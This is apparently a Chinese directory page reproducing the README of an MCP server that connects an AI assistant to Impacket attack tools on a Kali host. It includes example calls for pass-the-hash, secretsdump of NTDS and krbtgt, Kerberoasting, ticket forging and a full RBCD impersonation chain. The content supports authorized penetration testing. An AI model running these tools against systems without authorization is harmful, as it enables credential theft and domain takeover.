Token导航 LogoToken导航TokenDH.com
Sec Impacket MCP logo
安全风控未说明官方级别未说明来源级核验

Sec Impacket MCP

MCP Server

一个基于Impacket网络协议工具的MCP服务器,通过SSH连接到Kali Linux主机,使AI助手能够执行授权的渗透测试和Active Directory安全评估。

工具数

24

提示词数

0

GitHub Stars

0

资源数

0
渗透测试安全JavaScriptClaudeClaude DesktopClaude

安装说明

本站只整理中文说明和来源信息,不托管安装包,也不代用户安装。

作者 / 组织

schwarztim

提供方

schwarztim

最后核验

2026/5/17 20:23

快速接入

先看主来源和安装命令,再打开仓库或文档;下面只保留这个条目的关键接入事实。

详细介绍

Impacket MCP服务器

![MCP](https://modelcontextprotocol.io/) ![License: MIT](https://opensource.org/licenses/MIT) ![TypeScript](https://www.typescriptlang.org/) ![Impacket](https://github.com/fortra/impacket)

一种模型上下文协议(MCP)服务器,提供对以下内容的访问 减震器 通过SSH将网络协议工具连接到Kali Linux主机。这使AI助手能够执行授权的渗透测试和Active Directory安全评估。

概述

此MCP服务器封装了Impacket的全套网络协议工具,提供:

  • 远程执行:PsExec、WMIExec、SMBExec、DCOMExec、ATExec
  • 凭证攻击:SecretsDump、AS-REP烘焙、Kerberoasting、LAPS
  • Kerberos工具:TGT/TGS请求,金/银票创建
  • 活动目录:用户/计算机枚举、委派攻击、RBCD
  • SMB/网络:SMB客户端、NTLM中继、注册表操作、服务管理
  • 数据库:支持xp_cmdshell的MSSQL客户端

先决条件

  • Node.js 18+使用npm
  • SSH访问 使用无密码密钥身份验证连接到Kali Linux主机
  • 减震器 安装在Kali主机上(预装在Kali Linux上)

安装

# Clone the repository
git clone https://github.com/schwarztim/sec-impacket-mcp.git
cd sec-impacket-mcp

# Install dependencies
npm install

# Build the project
npm run build

配置

环境变量

变量描述默认值
KALI_HOSTKali Linux的SSH主机名kali

SSH设置

确保对Kali主机的无密码SSH访问:

# Generate SSH key if needed
ssh-keygen -t ed25519 -C "mcp-impacket"

# Copy to Kali host
ssh-copy-id kali

# Verify connection
ssh kali "impacket-psexec --help"

Claude桌面集成

添加到您的Claude Desktop配置(~/.config/claude/claude_desktop_config.json):

{
  "mcpServers": {
    "impacket": {
      "command": "node",
      "args": ["/path/to/sec-impacket-mcp/dist/index.js"],
      "env": {
        "KALI_HOST": "kali"
      }
    }
  }
}

可用工具

远程执行

工具说明
impacket_psexec通过SMB/SCM执行类似PsExec的操作-上传服务二进制文件
impacket_wmiexecWMI执行-更隐蔽,无需安装服务
impacket_smbexec使用本地SMB服务器执行SMB以进行输出
impacket_dcomexec基于DCOM的执行(MMC20、ShellWindows、ShellBrowserWindow)
impacket_atexec基于任务调度器的执行

凭证攻击

工具说明
impacket_secretsdump转储SAM、LSA机密、缓存凭据、NTDS.dit
impacket_getnpusersAS-REP烘焙-查找没有Kerberos预认证的用户
impacket_getuserspnsKerberoasting-枚举SPN并请求TGS票证
impacket_getlapspassword检索LAPS本地管理员密码

Kerberos工具

工具说明
impacket_gettgt请求Kerberos TGT进行传递票证攻击
impacket_getst请求Kerberos服务票证(TGS)
impacket_ticketer创建金/银Kerberos票证

活动目录

工具说明
impacket_getadusers枚举具有详细信息的AD用户
impacket_getadcomputers枚举AD计算机及其属性
impacket_lookupsid用于侦察的SID暴力计数
impacket_finddelegation查找委托关系(无约束、约束、RBCD)
impacket_addcomputer将计算机帐户添加到域
impacket_rbcd配置基于资源的约束委派

SMB/网络

工具说明
impacket_smbclient用于文件操作的SMB客户端
impacket_ntlmrelayxNTLM将攻击中继到各种协议
impacket_reg远程注册表操作
impacket_services远程服务管理

其他

工具说明
impacket_mssqlclient支持xp_cmdshell的MSSQL客户端
impacket_dpapi解密DPAPI保护的机密

身份验证方法

所有工具都支持多种身份验证方法:

方法参数示例
密码passwordpassword: "P@ssw0rd"
NTLM哈希hasheshashes: "aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
AES密钥aesKeyaesKey: "abcdef1234..."
Kerberoskerberoskerberos: true

使用示例

远程命令执行

// PsExec with password authentication
impacket_psexec({
  target: "192.168.1.100",
  domain: "CORP",
  username: "admin",
  password: "P@ssw0rd",
  command: "whoami /all"
})

// WMIExec with NTLM hash (pass-the-hash)
impacket_wmiexec({
  target: "192.168.1.100",
  domain: "CORP",
  username: "admin",
  hashes: "aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",
  command: "ipconfig /all"
})

凭证转储

// Dump domain controller secrets
impacket_secretsdump({
  target: "dc01.corp.local",
  domain: "CORP",
  username: "admin",
  password: "P@ssw0rd",
  just_dc_ntlm: true
})

// Dump specific user from NTDS
impacket_secretsdump({
  target: "dc01.corp.local",
  domain: "CORP",
  username: "admin",
  hashes: "aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",
  just_dc_user: "krbtgt"
})

Kerberos攻击

// Kerberoasting - request TGS for offline cracking
impacket_getuserspns({
  target: "corp.local",
  domain: "CORP",
  username: "user",
  password: "password",
  dc_ip: "192.168.1.1",
  request: true,
  format: "hashcat"
})

// AS-REP Roasting - find vulnerable accounts
impacket_getnpusers({
  target: "corp.local",
  dc_ip: "192.168.1.1",
  usersfile: "/tmp/users.txt",
  request: true,
  format: "hashcat"
})

// Request TGT for pass-the-ticket
impacket_gettgt({
  target: "CORP/admin",
  password: "P@ssw0rd",
  dc_ip: "192.168.1.1"
})

Active Directory枚举

// Enumerate all domain users
impacket_getadusers({
  target: "corp.local",
  domain: "CORP",
  username: "user",
  password: "password",
  dc_ip: "192.168.1.1",
  all: true
})

// Find delegation vulnerabilities
impacket_finddelegation({
  target: "corp.local",
  domain: "CORP",
  username: "user",
  password: "password",
  dc_ip: "192.168.1.1"
})

// SID enumeration for reconnaissance
impacket_lookupsid({
  target: "192.168.1.1",
  domain: "CORP",
  username: "guest",
  password: "",
  max_rid: 5000
})

RBCD攻击链

// 1. Add a computer account
impacket_addcomputer({
  target: "corp.local",
  domain: "CORP",
  username: "user",
  password: "password",
  dc_ip: "192.168.1.1",
  computer_name: "EVIL$",
  computer_pass: "Computer123!"
})

// 2. Configure RBCD on target
impacket_rbcd({
  target: "corp.local",
  domain: "CORP",
  username: "user",
  password: "password",
  dc_ip: "192.168.1.1",
  delegate_to: "TARGET-SERVER$",
  delegate_from: "EVIL$",
  action: "write"
})

// 3. Request service ticket with impersonation
impacket_getst({
  target: "CORP/EVIL$",
  password: "Computer123!",
  spn: "cifs/TARGET-SERVER.corp.local",
  dc_ip: "192.168.1.1",
  impersonate: "administrator"
})

安全考虑

此工具仅用于授权的安全测试。

  • 测试前始终获得适当的授权
  • 尽可能在隔离的实验室环境中使用
  • 遵循负责任的披露做法
  • 遵守所有适用的法律法规

发展

# Install dependencies
npm install

# Build TypeScript
npm run build

# Watch mode for development
npm run dev

相关项目

许可证

MIT许可证-请参阅 许可证 了解详情。

免责声明

此软件仅用于教育和授权的安全测试目的。作者不对该软件造成的任何误用或损坏负责。在进行任何安全评估之前,始终确保您有适当的授权。

目录标签

目录标签

渗透测试安全JavaScriptClaude本地部署ActiveDirectory网络安全远程执行凭证攻击

支持客户端

Claude DesktopClaude

接入字段

传输方式(transport,传输协议)

未说明

鉴权方式(authType,认证方式)

none

工具数量(toolCount,工具数)

24

资源数量(resourceCount,资源数)

0

提示词数量(promptCount,提示词数)

0

权限和风险

未说明none部署方式未说明

接入前请确认传输方式、认证方式和部署位置,并根据实际工具能力限制访问范围。

安装前确认

不要直接授予不必要的文件、网络或账号权限;先核对安装命令和配置内容。

仍需确认:installCommand

来源信息

继续浏览同类 MCP